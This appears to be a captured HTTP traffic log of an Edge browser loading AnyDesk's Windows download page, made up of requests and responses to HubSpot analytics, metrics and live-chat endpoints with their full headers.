GET /__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=7940397&rcu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&r=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads&pu=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&t=Remote+Desktop+Software+for+Windows+%E2%80%93+AnyDesk&cts=1728144496575&vi=a5b3d1933284be27e3a7527fad5a6a3f&nc=false&u=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&b=261462610.2.1728144483689&cc=15 HTTP/2.0
host: track.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:17 GMT
content-type: image/gif
content-length: 45
cf-ray: 8cdeab64398a0bad-AMS
cf-cache-status: DYNAMIC
cache-control: no-cache, no-store, no-transform
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-content-type-options: nosniff
x-envoy-upstream-service-time: 5
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/analytics-tracking-td/envoy-proxy-689db97f95-qg5wl
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: fa01427d-b31d-4015-b953-375dfd5d9e33
x-request-id: fa01427d-b31d-4015-b953-375dfd5d9e33
x-robots-tag: none
set-cookie: __cf_bm=Ga3YYyZlhnevqsmkVmdskHM7xwntOHIqBd6gZ6VSkOk-1728144497-1.0.1.1-EwC4i02DcaNR9GR_CgU46._DAXJSnf9e6bkfALrH4SBU5EtA7YVxZ.1QZa2oTBeD3Sv3u6QVUEab1XpiO93hZA; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYrkygxUHXORAzJgytp067mhEk4Df9qPIJhHvORantL%2BVFv7%2B8haCr3YOGT3F8UkmHOt20sNoraVLxSTc17r3hP3GwgcM%2BNbkm8ZM2rNfjUfL%2FvJqmdz8w2R%2FRdOKv9egm0M"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=PBgpjjsWhuhNdjc_yua_Buy2md1hCTD1nQTdHT3b3KI-1728144497436-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 3186
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:17 GMT
cf-ray: 8cdeab66ac600bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=3e0d511c-d26c-48ac-ac76-6732c604bcc7
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: 3e0d511c-d26c-48ac-ac76-6732c604bcc7
set-cookie: __cf_bm=e1yiX6XBp3qh0BLNJEldQ8A9edg9qhOPuJ8EjlO231o-1728144497-1.0.1.1-_nZbdFMNOt7k90nAt9sxzUSCozMpYdtjO.jywBd5NNq.pkkwOKZS9P0Tq9KDo3PgRdrRk1.93uqbZ.51IjUQeg; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=usVehhNDvj7V8CtIBpYBoCkwvDIY8%2FxfCngwwyMg9simd%2BoPPHcvGM16A2L%2BqqIENlMlsoCs8jrej0LMxq4RWApUxASYELp243o3NVHHw5THbk50SJuwpagWS6k9aX74vA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=q7nwkINWeEbsHe5RSDkvFE4dOLCZmSOsbUKJhm1p4lI-1728144497835-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/performance?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 328
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/19d7532a5e5749fbbfb32b46383ca6b0?uuid=ea9395a1d4604a038597a54463ee6361&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=19d7532a5e5749fbbfb32b46383ca6b0&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:17 GMT
cf-ray: 8cdeab66bc760bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=c2ebc1bc-6c52-4c3a-b09a-6de2e44a212f
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: c2ebc1bc-6c52-4c3a-b09a-6de2e44a212f
set-cookie: __cf_bm=b0Jweo0G8vzj5Tbq_Q_D7D4YxcF48jXMdR0XhXFYGKY-1728144497-1.0.1.1-CoGlJ9VCtFZIzRsaP50eLEKPhh1XFy0fK0NarKQPfUsXycOZ3TxdiATTkr2co4Ei3mkQCoxT4GBv500aSOkUTA; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg14HH8X552QRvJDxQ5Ikntx%2BVLonEg8nASWGNp1i9cuhiNFKkam62oyg5O9UkmfSewUIatttHUh%2F9dEYwz99F2MLwHs97WK6IObkGOzr%2FxNUbjmdOiLaSII0Sl7gEpVWg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=hUJAlbIbRP2p.q6jfi3Jb3ej_mdUJVR.NORQkC85oQ4-1728144497861-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/custom/send?hs_static_app=conversations-visitor-ui&hs_static_app_version=static-1.20626 HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 2142
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:17 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 12
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 29157072-3614-4bcd-8a05-1b5fa11eeef2
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-w9fj9
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 29157072-3614-4bcd-8a05-1b5fa11eeef2
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=UP4DLNrGZBz8V5anwlk8WV5dc3Xnmp.TOSRcChkBigw-1728144497-1.0.1.1-nIDLbOiSvOKXvfqFZ1MYUppcysOh.wTWo8FEvVVedifN62xN8KsPpjRxuKABp4m_Dkc3meKaIzZ69A7sLBN3dA; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jhDeZkEJyJgOmRNlFxGIpCznyLzY8rDGz7gRlBsaLGrYrz4%2BlUPxIyHWCu1NTyw2tBdWI8tcXz3fx%2FNkRZQJvZs6wKdrcaZ5YH7wrR4i7GqnkY9AcUhuRJJMnIlJeum551wR7jxpB%2Fu%2FKQXx"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=MwB4FZRYUm0IaS.pWNyihW9DE6oT.jA.5UbC_X2gY.A-1728144497879-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab670cc80bad-AMS
POST

https://metrics-fe-na1.hubspot.com/metrics/v1/frontend/send

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /metrics/v1/frontend/send HTTP/2.0
host: metrics-fe-na1.hubspot.com
content-length: 588
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:17 GMT
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 26
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: c216f161-b5cd-41de-abca-c6a4261f7430
x-evy-trace-served-by-pod: iad02/metrics-fe-td/envoy-proxy-5464c9d5f5-s7dj7
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: c216f161-b5cd-41de-abca-c6a4261f7430
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=hFkCtnWrBvWoRIUUdgfa1vICwC4iyesrVaknbryusC4-1728144497-1.0.1.1-PxKsQjP3lUBRKgQWS6kODaVB6E6VZ2gPZ5.WRXDHfSi5CQCuATXuIj1muBRlKR6kofJJ7R37WBFwVFk4VuAkIA; path=/; expires=Sat, 05-Oct-24 16:38:17 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y26NLMnhbmIFSz0mWRdmV8EqzicC7OVdpuCgclCxlH5FdU9lNHgsYL5UpdE0IpYaf4WegHecykLIAaiB5VNzEbr5uFZSJ2kei8dNUDdV3x4IgX%2BUkpGeKUkLyGc5AXayfRX8LeLImDYIxV3R"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=KZ2zX9.17T7_rMm.d5DhKPS0YLqpb74L14hFNneNrRY-1728144497895-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeab66fcbd0bad-AMS
GET

https://cta-service-cms2.hubspot.com/web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /web-interactives/public/v1/embed/combinedConfigs?portalId=7940397&currentUrl=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows&utk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: cta-service-cms2.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:18 GMT
content-type: text/plain; charset=utf-8
content-length: 18
cf-ray: 8cdeab688ed60bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
allow: HEAD,GET,OPTIONS
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: f52ce470-5ecb-4831-9d74-8938865f6d6f
set-cookie: __cf_bm=FDnaLLNBbaBQTkDVafmHt9LP1hvLneGYozfYYMGsTo4-1728144498-1.0.1.1-duKfJIffcp2ouV0NQruqtei_y70L5.Ia3IXPetyAg8DbL5VilNllvQZpESkURHrnzNRmOloHqu3NokO02kImzA; path=/; expires=Sat, 05-Oct-24 16:38:18 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLuSqZ38jiI5qLNVAq0GaJG4je3HHXC58%2BcTc3lQQj4yva3a0QyqIjkFNardGX2nlXMYeJX%2BZsQLmnx9BgSgd%2FDJDTrTEI8873ybvHWapocmptIuqVs5h4jSTAPIO%2FPBgQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=KOM2rXEDiKL7OLuT9A9Rjag3wSRW3tYwf9z8Gf7pA48-1728144498168-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
OPTIONS

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads

msedge.exe

Remote address:

104.16.117.116:443

Request

OPTIONS /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=c08b002be84840e4bf63c5e98ea0ad79&traceId=c08b002be84840e4bf63c5e98ea0ad79&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.2.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads HTTP/2.0
host: api.hubspot.com
accept: */*
access-control-request-method: GET
access-control-request-headers: x-hubspot-messages-uri
origin: https://anydesk.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-mode: cors
sec-fetch-site: cross-site
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:18 GMT
content-type: application/json;charset=utf-8
vary: origin
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent
access-control-allow-credentials: true
x-content-type-options: nosniff
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: OPTIONS, GET
access-control-max-age: 180
cache-control: max-age=0, no-cache, no-store
x-robots-tag: noindex, follow
x-envoy-upstream-service-time: 7
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 444aad69-ea35-48ef-bb60-1534ec887271
x-evy-trace-served-by-pod: iad02/star-hubspot-td/envoy-proxy-5485db5487-rt5qf
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 444aad69-ea35-48ef-bb60-1534ec887271
cf-cache-status: DYNAMIC
